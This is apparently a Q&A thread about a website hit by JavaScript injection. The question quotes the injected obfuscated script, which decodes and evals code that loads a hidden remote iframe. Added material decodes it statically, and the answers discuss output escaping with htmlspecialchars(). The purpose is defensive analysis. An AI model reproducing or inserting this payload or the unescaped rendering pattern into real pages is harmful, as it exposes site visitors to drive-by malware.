user1407853

Reputation: 46

JavaScript injection attack

Our website has been attacked. It looks like the JavaScript below was injected into the site. Certain browsers (Mozilla, etc.) print "Reported Attack Page!" when the page is visited.

Does anyone have an idea how to find the security leak and prevent it?

Thanks

<script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=
['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-335f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f5-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83']
[0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}
catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;585!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}
if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>

Upvotes: 2

Views: 1059
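The script in the question is a self-decoding payload: it splits the long array literal on "f", adds 42 to each number, maps the result through String.fromCharCode (the name is assembled as "fromC" + "harCode" so a plain signature scan does not see it), collects 585 characters and hands the string to window["eval"]. The two try/catch blocks are environment checks rather than error handling: assigning to the undeclared `prototype` throws only in a real JavaScript engine, and appendChild(string) throws only in a real DOM, so analysis sandboxes that do not raise those errors never reach the decode step. The decoder below is an added example, not code from the question or from the poster: it reimplements only the payload's own decoding arithmetic, never evaluates the result, and uses the first 48 numbers of the posted array (copied, with one stray space removed) as its sample input. The wrapper script and the regex that extracts the array are constructed here for the example.

```javascript
// Added example, not code from the question: decode the obfuscated payload
// statically instead of letting it eval() itself.

// Prefix of the array from the question (copied verbatim, one stray space
// removed), ending at the first "{" of the decoded script.
const SAMPLE_PREFIX =
  "-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81";

// Constructed wrapper in the same shape as the posted script, used to show
// the extraction step (the real array literal spans a line break too).
const SAMPLE_SCRIPT =
  "<script>i=0;try{avasv=prototype;}catch(z){h=\"harCode\";f=\n['" +
  SAMPLE_PREFIX +
  "']\n[0].split('f');v=\"e\"+\"va\";}</script>";

// Pull the encoded array literal out of the script source.
function extractEncodedArray(scriptSource) {
  const m = /\['([-0-9f]+)'\]\s*\[0\]\.split\('f'\)/.exec(scriptSource);
  if (!m) throw new Error("encoded array literal not found");
  return m[1];
}

// The transform the payload applies to itself (w[j]*1+42, then
// String.fromCharCode), minus the eval. A damaged token, e.g. a number that
// was split by a line wrap, becomes NaN and the original loop silently emits
// U+0000 for it; here it is reported so a broken copy is noticed.
function decodePayload(encoded, offset = 42) {
  return encoded
    .split("f")
    .map((tok) => {
      const n = Number(tok);
      if (tok === "" || !Number.isInteger(n)) {
        throw new Error(`bad token: ${JSON.stringify(tok)}`);
      }
      return String.fromCharCode(n + offset);
    })
    .join("");
}

// Inverse of the scheme, useful for confirming the offset and in tests.
function encodePayload(text, offset = 42) {
  return Array.from(text, (ch) => String(ch.charCodeAt(0) - offset)).join("f");
}

// Usage: console.log(decodePayload(extractEncodedArray(SAMPLE_SCRIPT)));
```

On the sample prefix this yields `if (document.getElementsByTagName('body')[0]){`, the opening line of the decoded script. Decoding the full posted array the same way shows the rest: once a body element exists it document.writes a hidden 10x10 iframe whose src is a remote URL, which is the kind of drive-by content that gets a page flagged by the browser's attack-page warning. Decode it offline like this; never run the sample in a browser to "see what it does".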

Answers (3)

verisimilitude

Reputation: 5108

Basically you need to use the function htmlspecialchars() whenever you want to output something to the browser that came from user input.

Something like this.

echo htmlspecialchars($string, ENT_QUOTES, 'UTF-8');

Upvotes: 1

Potney Switters

Reputation: 3062

As far as I know, injection attacks happen whenever you allow people to insert code into your website, by means of a comment or, in principle, any input fields which are not processed in order to avoid this kind of situation. So it is something that should be in your database.

Upvotes: 0

Gilly

Reputation: 9692

You should use htmlspecialchars() and filter all POST (and GET, for that matter) input at ALL times to prevent such XSS attacks.

Upvotes: 1
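Both verisimilitude's and Gilly's answers recommend htmlspecialchars(). The block below is an added example (not code from either answer) written in JavaScript rather than PHP so it runs beside the payload decoder above: a reimplementation of what `htmlspecialchars($s, ENT_QUOTES, 'UTF-8')` does to a string, applied to a constructed comment shaped like the injected script, plus the single-quoted-attribute case that shows why the ENT_QUOTES flag in verisimilitude's call matters (the PHP default before 8.1, ENT_COMPAT, leaves single quotes alone). The comment text, the attribute payload and the render functions are all constructed for the example.

```javascript
// Added example, not code from the answers: a JavaScript equivalent of
// PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8').

const ENT_COMPAT_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;" };
// ENT_QUOTES additionally converts the single quote (PHP emits &#039;).
const ENT_QUOTES_MAP = { ...ENT_COMPAT_MAP, "'": "&#039;" };

function htmlspecialchars(s, flags = "ENT_QUOTES") {
  const map = flags === "ENT_QUOTES" ? ENT_QUOTES_MAP : ENT_COMPAT_MAP;
  return String(s).replace(/[&<>"']/g, (ch) => map[ch] ?? ch);
}

// Constructed: a comment an attacker might submit, shaped like the opening
// statements of the script in the question (shortened).
const INJECTED_COMMENT =
  '<script>i=0;try{avasv=prototype;}catch(z){h="harCode";}</script>';

// Vulnerable pattern: user data concatenated straight into the page, so a
// stored comment containing <script> is served as markup.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + "</div>";
}

// Fixed pattern: escaped at the point it enters the HTML body, so the same
// comment is served as visible text.
function renderCommentSafe(comment) {
  return '<div class="comment">' + htmlspecialchars(comment) + "</div>";
}

// Single-quoted attribute: under ENT_COMPAT the quote survives and the value
// can close the attribute early and add its own; under ENT_QUOTES it cannot.
function renderTitleAttribute(value, flags) {
  return "<a title='" + htmlspecialchars(value, flags) + "'>link</a>";
}

// Quick check for a raw <script> open tag in rendered output.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

Two caveats a practitioner would add to the answers. First, output escaping only helps when the script arrived through user data that is stored and echoed back (the comment or form-field case Potney describes); if the `<script>` block is sitting in the site's own template or PHP files, it has to be found and removed there, and whatever access wrote it closed, before any escaping change makes a difference, so check both the served files and the database. Second, escape at the point of output for the context you are writing into (the HTML body here) rather than "filtering" POST and GET once on the way in: the same value may later be written into a JavaScript string or a URL, where HTML escaping is the wrong encoding.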
